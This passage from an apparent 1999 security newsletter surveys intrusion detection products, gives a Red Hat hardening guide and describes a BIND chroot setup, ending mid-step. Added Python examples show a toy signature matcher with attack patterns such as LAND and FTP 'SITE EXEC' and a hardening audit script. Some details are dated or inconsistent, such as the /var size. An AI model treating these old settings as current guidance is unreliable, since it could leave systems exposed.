ISS recommends running RealSecure on dedicated hosts. The detectors and console are both memory-intensive applications and shouldn't be running together on the same machine. A 300MHz server with 128MB of RAM is recommended for running detectors on NT 4.0. The console should have a 200MHz processor with 64MB of RAM on NT 4.0. Determining the amount of disk space can be difficult, and will depend on the volume of traffic and the RealSecure configuration. Security administrators need to determine which events are worth monitoring to prevent excessive use of disk space.

The first task with RealSecure is to add detectors to your configuration using the console.
Setting up a detector defines the attack signatures to monitor, user-defined connection events, user-specified actions, filters, e-mail notifications, and SNMP traps. The detectors and console communicate using strong encryption. Policies specify what type of traffic to monitor, the priority of events, and how the detector responds to events.

RealSecure uses three types of events: connection, security and user-defined filter. Security events use a static set of attack signatures to recognize suspicious activity that might be coming from an intruder. Connection events recognize connections through particular ports, from certain addresses, or with a certain type of protocol. User-defined filters allow the detectors to ignore particular kinds of traffic, based on the protocol, the source and destination IP addresses, and the source and destination ports.

When an event is detected, an action is carried out. RealSecure supports 10 types of actions; the most important are logging summary information, logging raw data, sending e-mail notification, killing a session, locking the firewall, viewing a session, and running user-defined actions. Sessions are killed by sending a TCP reset to both parties. Locking the firewall sends a command to the firewall to block traffic from the offending source IP address for a specified period of time. Viewing a session allows a security manager to monitor communications in real time. User-provided executables carry out user-defined actions.

Centrax

Centrax 2.2 is an integrated host- and network-based intrusion detection system with vulnerability assessment and policy management features, made by CyberSafe. Centrax consists of a Command Console and target services. As with RealSecure, the console lets security managers monitor and configure the intrusion detection software. The console runs on an NT server; the target services can run on both Solaris and NT systems.
CyberSafe recommends that the Console be run on at least a 166MHz machine with 64MB of RAM. Target services can run on NT Workstation or Server 3.51 or 4.0 with at least a 486 processor and 32MB of RAM. Around 50 or more attack signatures are provided for Solaris and around 80 signatures are provided for NT. Monthly updates to the attack signature set are available from the CyberSafe website. As with RealSecure, administrators can configure the responses to an event and shut down the system, log off the user, or even disable the account.

The attack signatures cover a range of objects and activities, including audit and administrative activities, critical system objects, decoy files, password changes, administrative groups, and user administration. Since Centrax includes a host-based component, there is some performance penalty on the monitored host, around two to five percent when optimally configured, unlike network-based systems, which run on a dedicated machine and only watch traffic. Another difference between network- and host-based systems such as Centrax is that the latter belong within the intranet, not on the perimeter of the network.

The Centrax 2.2 Console is made up of several components. Target Agents communicate with target services to distribute audit and collection policies, along with gathering status information from the services. Assessment Manager evaluates security vulnerabilities, such as problems with guest accounts and administrative privileges. Alert Manager notifies security managers of a detected intrusion or threat. Detection Policy Editor is used to define the list of potential attacks to watch for and the means of notification. Gathering data from the target services is governed by policies defined in the Collection Policy Editor. Last, the Report Manager provides forensic analysis and detailed reports of current system activity.
AXENT NetProwler

AXENT NetProwler is a network-based intrusion detection tool that lets users define custom signatures. It is initially configured with more than 200 well-known attack profiles/signatures, which include port scanning, denial of service, TCP sequence number spoofing, and IP address spoofing. NetProwler provides a GUI tool that lets users create attack signatures for less common types of attacks, such as attempts to access an Oracle database, and more. In addition, NetProwler provides other network management tools, which include consistency checks for DNS server tables and Web and FTP daemon content, time-of-day access restrictions, and inactive session purging.

NetProwler, like RealSecure and Centrax, uses a combination of centralized management, distributed collection and detection agents, and a data repository. The NetProwler console is a Java-based tool that runs from a Web browser. The centralized data repository supports Microsoft Access and SQL databases. As with the other tools, administrators can configure their own systems to monitor activity and review attack signatures from the console.

The most distinguishing characteristic of NetProwler is its ability to define custom attack signatures using an attack signature wizard. Stateful Dynamic Signature Inspection (SDSI) comprises a virtual processor, an instruction set for defining attack signatures, and a cache for maintaining the state of connections monitored by the processor. When a packet is processed, the previously gathered information in the cache and the attack signature definitions are executed on the virtual processor. When an attack pattern is found, the actions associated with the attack are executed. Since attack signatures are data-driven, new ones can be added in real time. AXENT maintains an Internet Security team which researches new threats and vulnerabilities and then publishes attack signatures that can be downloaded as needed.
A graphical user interface is used to configure and monitor the system, allowing administrators to monitor both network-based and host-based intrusion detection systems across the network. When first installed, NetProwler analyzes traffic on the network and examines hosts on the segment to determine which attack profiles should be loaded. This assessment also includes discovery of popular systems and applications. At any point after the installation, an administrator can add custom attack signatures using a drag-and-drop tool. Three types of attacks can be defined:

1. One-off attack, such as a LAND attack, in which a single packet carries the same address as both source and destination; the whole attack is done with a single transmission.
2. Sequential or low-level attack, in which there is a series of exchanges between the server and the client.
3. Counter-based attack, such as 20 queries to the same database lookup page, which can be blocked based on the number of times a pattern appears in the stream of network traffic.

All three types are defined by using keywords, for example TCP Stack, and a set of predefined expressions, such as conditional statements.

Protecting User Privacy

PlanetAll provides a Web-based contact management repository for its clients. Users can define address books and link to other PlanetAll users, sharing scheduling and address information. PlanetAll has a strict policy of safeguarding a user's privacy, believing that contact information should be completely private and shared only when users explicitly choose to share it. As part of the overall security plan for protecting customer information, PlanetAll uses NetProwler. On the downside, NetProwler, and network-based detection mechanisms in general, do not work on switched networks, since traffic is not broadcast through the entire segment. To provide NetProwler with access to the entire traffic stream, PlanetAll had to place its server outside the switched network segment.
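The three signature types above map onto a small amount of per-flow state. The following is an added example, not AXENT's SDSI engine: a toy matcher that keeps a connection-state cache and implements one signature of each kind over constructed packet records. The LAND check is stateless, the FTP "USER then SITE EXEC" signature only fires when the two commands arrive in order on the same flow, and the counter signature fires on the 20th identical query from one source. The packet fields, the 20-query threshold and the sample traffic are all assumptions made for the example.

```python
"""Toy stateful signature engine modelled on the one-off, sequential and
counter-based signature types described for NetProwler. Added example;
not AXENT code. All packets below are constructed, not captured."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str          # "tcp", "udp", "icmp"
    dport: int = 0
    flags: str = ""     # TCP flags as letters, e.g. "S", "SA", "A"
    payload: str = ""   # first line of application data, if any


QUERY_THRESHOLD = 20    # assumed: the "20 queries" figure from the text


class SignatureEngine:
    """Holds the per-flow state cache that stateful inspection needs."""

    def __init__(self, query_threshold=QUERY_THRESHOLD):
        self.query_threshold = query_threshold
        self.flow_step = defaultdict(int)     # (src, dst, dport) -> step reached
        self.query_count = defaultdict(int)   # (src, dst, path) -> hits seen
        self.alerts = []

    def feed(self, packets):
        for p in packets:
            self.process(p)
        return self.alerts

    def process(self, p):
        self._one_off_land(p)
        self._sequential_ftp_site_exec(p)
        self._counter_repeated_query(p)

    def _one_off_land(self, p):
        # One-off: a single SYN whose source equals its destination.
        if p.proto == "tcp" and "S" in p.flags and p.src == p.dst:
            self.alerts.append(("one-off", "LAND", p.src))

    def _sequential_ftp_site_exec(self, p):
        # Sequential: step 1 is a USER command, step 2 is SITE EXEC on the
        # same flow. SITE EXEC on a flow that never sent USER does not match.
        if p.proto != "tcp" or p.dport != 21:
            return
        key = (p.src, p.dst, p.dport)
        line = p.payload.upper()
        if self.flow_step[key] == 0 and line.startswith("USER "):
            self.flow_step[key] = 1
        elif self.flow_step[key] == 1 and line.startswith("SITE EXEC"):
            self.flow_step[key] = 2
            self.alerts.append(("sequential", "FTP SITE EXEC after USER", p.src))

    def _counter_repeated_query(self, p):
        # Counter-based: the same GET path from one source, N times.
        if p.proto != "tcp" or p.dport != 80 or not p.payload.startswith("GET "):
            return
        path = p.payload.split()[1]
        key = (p.src, p.dst, path)
        self.query_count[key] += 1
        if self.query_count[key] == self.query_threshold:
            self.alerts.append(("counter", f"{self.query_threshold} queries to {path}", p.src))


def sample_traffic():
    """Constructed traffic exercising all three signatures and one non-match."""
    pkts = [Packet("10.0.0.5", "10.0.0.5", "tcp", 139, "S")]                     # LAND
    pkts.append(Packet("10.0.0.9", "10.0.0.1", "tcp", 21, "A", "SITE EXEC foo"))  # no USER first
    pkts.append(Packet("10.0.0.7", "10.0.0.1", "tcp", 21, "A", "USER anonymous"))
    pkts.append(Packet("10.0.0.7", "10.0.0.1", "tcp", 21, "A", "SITE EXEC %p"))
    pkts += [Packet("10.0.0.8", "10.0.0.2", "tcp", 80, "A",
                    "GET /lookup.cgi?q=x HTTP/1.0")] * QUERY_THRESHOLD
    return pkts


def run_demo():
    return SignatureEngine().feed(sample_traffic())


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The point of the flow cache is visible in the second packet: the same SITE EXEC string that alerts on the 10.0.0.7 flow is ignored on 10.0.0.9, because that flow never reached step 1. A real engine would also expire cache entries and key HTTP counters on a time window.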
Conclusion

Intrusion detection is another type of security tool that IT managers must deploy to protect their information resources. Intrusion detection complements firewalls by allowing a higher level of analysis of traffic on a network and by monitoring the behavior of sessions on the servers. Network-based detection has access to the entire OSI stack, but is limited on switched networks and on Virtual Private Networks, where the traffic is encrypted. Host-based intrusion detection systems provide more operating-system-specific monitoring, but cannot protect against low-level attacks such as a denial-of-service attack. Intrusion detection vendors have known of the limitations of these approaches and are now offering multiple programs, such as NetProwler's host-based counterpart from AXENT, Intruder Alert, to provide more accurate coverage and logs.

Copyright Secure System Administration Research, 1999, all rights reserved.

@HWA

63.0 Preparing your Linux box for the internet: Armoring Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preparing your Linux box for the Internet
Armoring Linux
Lance Spitzner
Last Modified: 23 June, 1999

Organizations throughout the world are adopting Linux as their production platform. By connecting to the Internet to provide critical services, they also become targets of opportunity. To help protect these Linux systems, this article covers the basics of securing a Linux box. The examples provided here are based on Red Hat 5.x, but should apply to most Linux distributions.

Installation

The best place to start in armoring your system is at the beginning: OS installation. Since this is a production system, you cannot trust any previous installations. You want to start with a clean installation, where you can guarantee the system integrity. Place your system in an isolated network. At no time do you want to connect this box to an active network or the Internet, exposing the system to a possible compromise.
I personally witnessed a system hacked by a script kiddie within 15 minutes of connecting to the Internet. To get critical files and patches later, you will need a second box that acts as a go-between. This second box downloads files from the Internet, then connects to your isolated configuration "network" to transfer the critical files. Once you have placed your future Linux box in an isolated network, you are ready to begin.

The first step is selecting what OS packages to load. The idea is to load the minimum installation while maintaining maximum efficiency. Choose the installation that suits your needs, but deselect packages you will not be using. The less software that resides on the box, the fewer potential security exploits or holes. This means if you do not need the News or Real Audio server, don't install it. The nice thing about Linux is that it is easy to add packages later. Regardless of which installation you choose, I would add the manual pages and HOWTO docs. I find the on-line man pages and docs to be a critical resource that adds little risk to your system.

During the installation process, you will be asked to partition your system. I always like to make root as big as possible and just throw everything in there, so you do not run out of room in the future. However, we do need several partitions to protect the root drive. If we were to fill the root partition with data, such as logging or email, we would cause a denial of service, potentially crashing the system. Therefore, I always recommend a separate partition for /var; this is where all the system logging and email goes. By isolating the /var partition, you protect your root partition from overfilling. I've found 400 MB to be more than enough for /var. You may also consider making a separate partition for specific application purposes, especially applications that store extensive logging.
With such a setup, your partitions would look as follows:

/     - everything else
/var  - 200 MB
swap  - (max 127 MB of RAM)

Once the system has rebooted after the installation, be sure to install the recommended security patches. For Red Hat, you can find these security patches at http://www.redhat.com/support. An excellent example is the security update for wu-ftpd. Without these patches, your system can be easily compromised. Be sure to use your go-between box to get the patches; the Linux box should always remain on an isolated network. Patches are critical to armoring a system and should always be kept up to date. BUGTRAQ@netspace.org is an excellent source for following bugs and system patches. For Red Hat, once you download the rpm, you can easily update your system using the following syntax:

rpm -Uvh wu-ftpd-2.4.2b18-2.1.i386.rpm

For systems that are already on-line, you can ftp the rpm and install it at the same time, using the following syntax:

rpm -Uvh ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm

Eliminating Services

Once you have loaded the installation package and patches and rebooted, we are ready to armor the operating system. Armoring consists mainly of turning off services, adding logging, tweaking several files, and configuring TCP Wrappers. First we will begin with turning off services. By default, Linux is a powerful operating system that executes many useful services. However, most of these services are unneeded and pose a potential security risk. The first place to start is /etc/inetd.conf. This file specifies which services the /usr/sbin/inetd daemon will listen for. By default, /etc/inetd.conf is configured for a variety of services; you most likely only need two, ftp and telnet. You eliminate the remaining unnecessary services by commenting them out (example A). This is critical, as many of the services run by inetd pose serious security threats, such as popd, imapd, and rsh.
Confirm what you have commented out with the following command (this will show you all the services that were left uncommented):

grep -v "^#" /etc/inetd.conf

The next place to look is the .rc scripts; these scripts determine what services are started by the init process. For Red Hat, you will find these scripts in /etc/rc.d/rc3.d. To stop a script from starting, replace the capital S with a small s. That way you can easily start the script again just by replacing the small s with a capital S. Or, if you prefer, Red Hat comes with a great utility for turning off these services. Just type "/usr/sbin/setup" at the command prompt and select "System Services"; from there you can select what scripts are started during the boot-up process. Another option is chkconfig, which you will find on most distributions.

The following startup scripts may be installed by default but are not critical to system functioning. If you don't need them, turn these scripts off. The numbers in the names determine the sequence of initialization; they may vary based on your distribution and version.

S05apmd      (You only need this script for laptops)
S10xntpd     (Network time protocol)
S15sound
S20bootparamd (Used for diskless clients, you probably don't need this vulnerable service)
S20nfs       (Used for an NFS server, do not run unless you absolutely have to)
S20rusersd   (Try to avoid running any r services, they provide too much information to remote users)
S20rwalld
S20rwhod
S25innd      (News server)
S25squid     (Proxy server)
S30sendmail  (You can still send email if you turn this script off, you just will not be able to receive or relay)
S30ypbind    (Required if you are a NIS client)
S34yppasswdd (Required if you are a NIS server, this is an extremely vulnerable service)
S35dhcpd
S35ypserv    (Required if you are a NIS server, this is an extremely vulnerable service)
S40portmap   (This startup script is required if you have any rpc services, such as NIS or NFS)
S40snmpd     (SNMP daemon, can give remote users detailed information about your system)
S55routed    (RIP, don't run this unless you REALLY need it)
S55named     (DNS server. If you are setting up DNS, upgrade to BIND 8.2, http://www.isc.org/bind.html)
S60atd       (Used for the at service, similar to cron, but not required by the system)
S60lpd       (Printing services)
S72amd       (AutoMount daemon, used to mount remote file systems)
S75gated     (Used to run other routing protocols, such as OSPF)
S85httpd     (Apache webserver, I recommend you remove the installed version and upgrade to the latest version, http://www.apache.org)
S95nfsfs     (This is the nfs client, used for mounting filesystems from an nfs server)
S95pcmcia    (You only need this script for laptops)

To see how many processes are running before you change the startup scripts, type

ps aux | wc -l

Once you are done with the installation and have turned off the startup scripts, type the command again and compare how the number of processes has decreased. The fewer services running, the better.

Logging and Tweaking

Once you have eliminated as many services as possible, we want to enable logging. All system logging occurs in /var/log. By default, Linux has excellent logging, except for ftp. You have two options for ftp logging: configure the /etc/ftpaccess file or edit /etc/inetd.conf. I prefer to edit /etc/inetd.conf, as it is simpler (i.e. harder to mess up :). Edit /etc/inetd.conf as follows to ensure full logging of all FTP sessions:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o

--- From the man pages ---
If the -l option is specified, each ftp session is logged in the syslog.
If the -L flag is used, command logging will be on by default as soon as the ftp server is invoked. This will cause the server to log all USER commands, which, if a user accidentally enters a password for that command instead of the username, will cause passwords to be logged via syslog.
If the -i option is specified, files received by the ftpd(8) server will be logged to the xferlog(5).
If the -o option is specified, files transmitted by the ftpd(8) server will be logged to the xferlog(5).
--- snip snip ---

Next comes tweaking. This involves various file administration. The first thing we want to do is create the file /etc/issue. This file is an ASCII text banner that appears for all telnet logins (example B). This legal warning will appear whenever someone attempts to login to your system. By default, Red Hat's startup scripts create a new /etc/issue file on every reboot, so if you want to keep using the same /etc/issue file, you will have to modify /etc/rc.d/rc3.d/S99local.

We want to do two things to secure our /etc/passwd file (this is the database file that holds your user accounts and passwords). First, we want to convert our system to use /etc/shadow; this stores everyone's password hashes in a file only root can access. This protects your passwords from being easily accessed and cracked (one of the first things a hacker looks for). All you have to do is type the following command as root. This automatically moves your encrypted passwords to the /etc/shadow file. Of all the actions you can take to secure your system, I consider this to be one of the most important.

pwconv

The second step is to remove most of the default system accounts in /etc/passwd. Linux provides these accounts for various system activities which you may not need. If you do not need the accounts, remove them.
The more accounts you have, the easier it is to access your system. An example is the "news" account. If you are not running nntp, a news group server, you do not need the account (be sure to update /etc/cron.hourly, as this looks for the user "news"). Also, make sure you remove the "ftp" account, as this is the account used for anonymous ftp. From the man pages:

man ftpd:
Ftpd authenticates users according to four rules.
4) If the user name is ``anonymous'' or ``ftp'', an anonymous ftp account must be present in the password file (user ``ftp''). In this case the user is allowed to log in by specifying any password (by convention this is given as the client host's name).

For an example of my /etc/passwd file, check out example C.

We also want to modify the file /etc/ftpusers (example D). Any account listed in this file cannot ftp to the system. This restricts common system accounts, such as root or bin, from attempting ftp sessions. Linux has the file by default. Ensure that root stays in this file; you never want root to be able to ftp to this system. Ensure that any accounts that need to ftp to the box are NOT in the file /etc/ftpusers.

Also, ensure that root cannot telnet to the system. This forces users to login to the system as themselves and then su to root. The file /etc/securetty lists which ttys root can log in on. List only tty1, tty2, etc. in this file; this restricts root logins to local access only. ttyp1, ttyp2, etc. are pseudo terminals, and listing them would allow root to telnet to the system remotely (example E).

TCP Wrappers

TCP Wrappers are a must; no armored system should be without them. Created by Wietse Venema, TCP Wrappers is a binary that wraps itself around inetd services, such as telnet or ftp. With TCP Wrappers, the system launches the wrapper for inetd connections, which logs all attempts and verifies the attempt against an access control list. If the connection is permitted, TCP Wrappers hands the connection to the proper binary, such as telnet.
If the connection is rejected by the access control list, then the connection is dropped. Fortunately for us Linux users, TCP Wrappers is already installed; the only thing left for us to do is edit the /etc/hosts.allow and /etc/hosts.deny files. These files determine who can and cannot access our systems. Also, TCP Wrappers allows us to do fancy things, such as banners, or spawning additional programs, such as safe_finger. The syntax is relatively simple. Put the IP addresses or networks you want to permit connections from in /etc/hosts.allow. Put the IP addresses or networks you do not want to permit access in /etc/hosts.deny. By default, Linux allows connections from everyone, so you will need to modify these files. Two recommendations when working with TCP Wrappers:

1. Use IP addresses and networks instead of domain names.
2. Set up /etc/hosts.deny to deny everything (ALL), then permit only specific sites with /etc/hosts.allow.

For examples on how to set up /etc/hosts.allow and /etc/hosts.deny, see example F.

For the Truly Paranoid

I consider the measures discussed above absolutely essential. By following these steps, you have greatly improved your system's security, congratulations! Unfortunately, your system is not 100% secure, nor will it ever be. So, for the truly paranoid, I have added some additional steps you can take.

First we will create the wheel group. The wheel group is a group of select individuals that can execute powerful commands, such as /bin/su. By limiting the people that can access these commands, you enhance the system security. To create the group, vi the file /etc/group, create the group wheel, and add the system admins to the group. Then identify critical system binaries, such as /bin/su. Change the group ownership to wheel, and the permissions to owner and group executable only (be sure to maintain the suid or sgid bit for specific binaries).
For /bin/su, the commands would be:

/bin/chgrp wheel /bin/su
/bin/chmod 4750 /bin/su

Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv. The r commands use these files to access systems. To lock them down, touch the files, then change the permissions to zero. This way no one can create or alter the files. For example:

/bin/touch /.rhosts /.netrc /etc/hosts.equiv
/bin/chmod 0 /.rhosts /.netrc /etc/hosts.equiv

Third, we make some modifications to PAM. PAM (Pluggable Authentication Modules) is a suite of shared libraries that enable you to choose how applications authenticate users. To learn more about PAM, check out ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. There are a variety of tweaks that you can make to your system. Here is an example of how to convert your encrypted passwords to use MD5, making your /etc/shadow file far more difficult to crack. Go to the /etc/pam.d directory, where you will find all the configuration files for the different binaries that require authentication. Most of the configuration files will have the following entry:

password required /lib/security/pam_pwdb.so nullok use_authtok

All you need to do is find all the configuration files that have this entry and add "md5" to the end, so it looks like this:

password required /lib/security/pam_pwdb.so nullok use_authtok md5

Note that existing hashes are not converted; each account gets an MD5 hash the next time its password is changed. For my Red Hat 5.1 system, I had to edit this line in the following configuration files in /etc/pam.d:

chfn
chsh
login
passwd
rlogin
su
xdm

The last thing we can do is protect our system from physical access. This mainly consists of setting up a password for our BIOS. Also, you can password protect your system during boot-up by configuring /etc/lilo.conf with a password (password=xxx), where xxx is your password. Since that password is stored in clear text in /etc/lilo.conf, make the file readable by root only. However, keep in mind that once someone has physical access to your system, there is no guaranteed way to protect it.
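The steps from "Eliminating Services" through "For the Truly Paranoid" are all checkable from the filesystem, so a practitioner usually wants a script that re-verifies them after every change. The following is an added example, not Lance Spitzner's code: an audit that takes a root prefix, so it can be run against "/" on the armored box or, as here, against a constructed Red Hat 5.x-style tree that is deliberately only half armored. The sets of allowed inetd services and risky rc3.d scripts are taken from the article's lists; the fixture contents, the finding strings and the fact that only /bin/su's world bits are checked (group ownership needs a real wheel group) are assumptions of the example.

```python
"""Audit of the armoring steps above. Added example, not the article's code.
audit(root) returns a list of findings; build_sample_root() constructs a
half-armored tree so the audit can run offline as an unprivileged user."""
import os
import stat
import tempfile

ALLOWED_INETD = {"ftp", "telnet"}                       # the two the article keeps
RISKY_RC = {"rusersd", "rwalld", "rwhod", "bootparamd", "nfs", "snmpd",
            "routed", "yppasswdd", "ypserv", "amd", "gated"}
LOCKED_FILES = ["/.rhosts", "/.netrc", "/etc/hosts.equiv"]


def _read_lines(root, path):
    full = os.path.join(root, path.lstrip("/"))
    if not os.path.exists(full):
        return None
    with open(full) as f:
        return [line.rstrip("\n") for line in f]


def active_inetd_services(root):
    """Same result as: grep -v '^#' /etc/inetd.conf, reduced to service names."""
    lines = _read_lines(root, "/etc/inetd.conf") or []
    return [l.split()[0] for l in lines if l.strip() and not l.startswith("#")]


def enabled_rc_services(root):
    """S##name links are enabled; the article disables them by lowercasing the S."""
    rcdir = os.path.join(root, "etc/rc.d/rc3.d")
    if not os.path.isdir(rcdir):
        return []
    return sorted(n[3:] for n in os.listdir(rcdir) if n[0] == "S" and n[1:3].isdigit())


def audit(root):
    findings = []
    for svc in active_inetd_services(root):
        if svc not in ALLOWED_INETD:
            findings.append(f"inetd: {svc} still enabled")
    for svc in enabled_rc_services(root):
        if svc in RISKY_RC:
            findings.append(f"rc3.d: {svc} starts at boot")
    ftpusers = _read_lines(root, "/etc/ftpusers")
    if ftpusers is None or "root" not in ftpusers:
        findings.append("ftpusers: root may ftp in")
    for tty in _read_lines(root, "/etc/securetty") or []:
        if tty.startswith("ttyp"):
            findings.append(f"securetty: {tty} lets root log in over the network")
    if _read_lines(root, "/etc/shadow") is None:
        findings.append("shadow: /etc/shadow missing, run pwconv")
    deny = [l for l in (_read_lines(root, "/etc/hosts.deny") or []) if not l.startswith("#")]
    if not any(l.replace(" ", "").startswith("ALL:ALL") for l in deny):
        findings.append("tcpwrappers: hosts.deny lacks ALL: ALL")
    su = os.path.join(root, "bin/su")
    if os.path.exists(su):
        mode = stat.S_IMODE(os.stat(su).st_mode)
        if mode & 0o007:    # any world bit set: not 4750 / group wheel
            findings.append(f"su: mode {oct(mode)} is world-accessible; want 4750 with group wheel")
    for p in LOCKED_FILES:
        full = os.path.join(root, p.lstrip("/"))
        if not os.path.exists(full):
            findings.append(f"{p}: not present; touch it and chmod 0")
        elif stat.S_IMODE(os.stat(full).st_mode) != 0:
            findings.append(f"{p}: mode is not 0")
    return findings


def build_sample_root():
    """Constructed tree: finger left in inetd.conf, rusersd still enabled,
    ttyp1 in securetty, su world-executable, hosts.equiv never locked."""
    root = tempfile.mkdtemp(prefix="armor-")

    def put(path, text, mode=0o644):
        full = os.path.join(root, path.lstrip("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(text)
        os.chmod(full, mode)

    put("/etc/inetd.conf",
        "#echo   stream tcp nowait root internal\n"
        "ftp     stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o\n"
        "telnet  stream tcp nowait root /usr/sbin/tcpd in.telnetd\n"
        "#shell  stream tcp nowait root /usr/sbin/tcpd in.rshd\n"
        "finger  stream tcp nowait root /usr/sbin/tcpd in.fingerd\n")
    for name in ("S10xntpd", "S20rusersd", "s20nfs", "S40portmap", "S99local"):
        put("/etc/rc.d/rc3.d/" + name, "#!/bin/sh\n", 0o755)
    put("/etc/ftpusers", "root\nbin\ndaemon\n")
    put("/etc/securetty", "tty1\ntty2\nttyp1\n")
    put("/etc/shadow", "root:$1$abc:10000:0:99999:7:::\n", 0o600)
    put("/etc/hosts.deny", "ALL: ALL\n")
    put("/etc/hosts.allow", "in.ftpd: 192.168.1.\n")
    put("/bin/su", "#!/bin/sh\n", 0o4755)
    put("/.rhosts", "", 0)
    put("/.netrc", "", 0)
    return root


if __name__ == "__main__":
    for finding in audit(build_sample_root()):
        print(finding)
```

Run as root with audit("/") on the real box; the two helper functions also give you the same lists the article builds by hand with grep and ls.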
Conclusion

We have covered some of the more basic steps involved in armoring a Linux box (Red Hat distribution). The key to a secure system is having the minimal software installed, with protection in layers, such as TCP Wrappers. There are many additional steps that can be taken, such as ipchains (firewall software), ssh (an encrypted replacement for rlogin, rcp, and telnet), tripwire (monitors changes in system binaries), and swatch (automated log monitoring and alerts). Remember, no system is truly 100% secure. However, with the steps outlined above, you greatly reduce the security risks.

Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.

@HWA

64.0 Securing DNS (Linux version)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There have been a large number of problems with BIND because of the size and complexity of the functions it performs. As a result, a number of attacks are beginning to emerge that target this service specifically, some of which can allow full remote access to the target host. Because systems running DNS servers are so critical to the network infrastructure, it is vital that these systems do not get compromised. To further this, I've prepared this short document that describes how to set up your BIND 8.x server in a chroot() environment under Red Hat Linux (it should apply to others as well). This document is largely inspired by my friend Adam Shostack and his paper on the identical subject matter (which covers Solaris). Please read his paper (and check out his entire page, which contains good reading) after you've been here.

NOTE: This is a living document and I expect changes and small errors to be discovered over time. My DNS server is very small and handles a limited number of zones and traffic. It is quite possible that the information I supply here does not work for larger sites.
If this is your case, please write me and tell me what is broken so I can change it here! Your input will be given full credit and will help everyone who wishes to contain the beast we call BIND.

Linux NOTE: Although I do all my development on Red Hat Linux, my WWW/SMTP/DNS server is in fact OpenBSD. This document was originally written for OpenBSD usage, but was modified to describe the procedure under Linux (which is only slightly different). Because of this, I openly admit that I have very little experience running BIND under Linux in a chroot() environment. While I believe the information in this area to be accurate, it may in fact vary somewhat from version to version of Linux. If this is the case then please write me and tell me! I would like to make this document as accurate as possible and this can only be done with your help.

Step One: Get The Software and Install

Go to the ISC FTP site and download the latest version of BIND (these directions have only been tested on BIND version 8.x, which is the version you should be running anyway). Install the software per the directions included with the package.

Go to Obtuse Systems' FTP site and download their free program called holelogd (and some other neat utilities). This program creates a /dev/log socket under a chroot environment so syslog will work from named once it has been contained. OpenBSD's syslogd already has this feature built in ("syslogd -a /chroot/dev/log"), but Linux does not (though it should). holelogd emulates that OpenBSD feature. Install holelogd per the instructions (usually in /usr/local/sbin).

Step Two: Make static named and named-xfer binaries

After the build and install you will need to make a statically linked version of the program. This is easily accomplished by going into the directory src/port/linux under the BIND source tree and editing the file Makefile.set.
Change the line:

CDEBUG= -O2 -g

To:

CDEBUG= -O2 -static

Go to the top of the BIND source directory and do a "make clean" followed by a "make". Then go on to the next step, where you will copy the files to the chroot() directory.

For the uninitiated, a statically linked program is one that does not perform dynamic loading of libraries. For a chroot() environment it means that the executable will be "self-contained" and will not fail because a library file is missing inside the jail. While it is not necessary to have statically linked files in the chroot() environment, it often makes setup easier. I prefer to have all network daemons statically linked for this reason.

Step Three: Make a Directory for BIND

Create a directory for BIND to be chroot()ed in. This can be as simple as /chroot/named and will be the "pseudo" root where BIND will reside. The ultra-paranoid may even want to put this chroot jail on a separate physical volume. Under this directory you will need to create the following directory structure:

/dev
/etc
/etc/namedb
/usr/sbin
/var/run

Under each directory you will need to copy the following files and/or perform the following commands:

/            None
/etc         copy named.conf from /etc
             copy localtime from /etc (so named logs the correct timezone in syslog)
             create /etc/group with the named GID as the only entry (thanks Bernhard Weisshuhn)
/etc/namedb  copy all zone databases and files from /etc/namedb
/dev         mknod ./null c 1 3; chmod 666 null
             (for other Linux variants, look at /dev/MAKEDEV to get the mknod command)
/usr/sbin    copy the statically linked named and named-xfer binaries from the BIND
             src/bin/named and src/bin/named-xfer directories
/var/run     None

Additionally, Bernhard Weisshuhn writes that if you have custom logging directories specified, you need to be sure to make these as well (/var/log). Although named won't crash, it will complain.

Step Four: Add named user and group

Add the user named to the /etc/passwd and to the /etc/group files.
This will be the UID/GID that the server runs under. You should now go to the /chroot/named/var/run directory and make it writable by named so the named.pid file can be written upon startup. This is used by the ndc command to control named's operation.

At this point you may want to go into your chroot named area and chown -R named.named the /etc/namedb directory. This allows named to dump cache and statistical information when you send it the proper signal (SIGINT: kill -INT followed by named's process ID). This change should not significantly affect the security of your chroot() setup. Leaving it owned by root won't allow named to write out this information (remember, named now runs under a new UID and no longer as root), but still allows named to function. A second option is to change the permissions to allow writing to this directory while leaving it owned by root. This could also work, but you need to be careful to ensure normal users can't modify your named records!

IMPORTANT: DO NOT USE AN EXISTING UID/GID to run named under (i.e. "nobody"). It is always a bad idea to use an existing UID/GID under a chroot environment as it can impact the protection offered by the service. Make a separate UID/GID for every daemon you run under chroot() as a matter of practice.

Step Five: Edit startup scripts

Linux uses SYS V style init files and there are several places to put the named commands to run. The cleanest location is in the named init script located in /etc/rc.d/init.d/named. In there you will find a section where named is started. You need to add and change a couple of lines.

1) Put in a line before executing named to start up holelogd. holelogd needs to be told where to put the remote socket; this should be your chroot named dev directory made above. It should look something like this:

# Start daemons.
echo -n "Starting holelogd: "
daemon /usr/local/sbin/holelogd /chroot/named/dev/log
echo
echo -n "Starting named: "
daemon named
echo
touch /var/lock/subsys/named
;;

2) You will also need to change the startup flags for BIND. Version 8.x has a feature where you can change the user and group ID after binding. This is where you specify the UID/GID you assigned to BIND above:

# Start daemons.
echo -n "Starting holelogd: "
daemon /usr/local/sbin/holelogd /chroot/named/dev/log
echo
echo -n "Starting named: "
daemon /chroot/named/usr/sbin/named -u named -g named -t /chroot/named
echo
touch /var/lock/subsys/named
;;

3) named ships with a script called "ndc" which is used to control named operations. You will need to edit this file and change the location of the variable PIDFILE from /var/run/named.pid to /chroot/named/var/run/named.pid.

Step Six: Test it out

Start up holelogd by typing:

/usr/local/sbin/holelogd /chroot/named/dev/log

Go into this directory and ls -al. You should see (the date is insignificant):

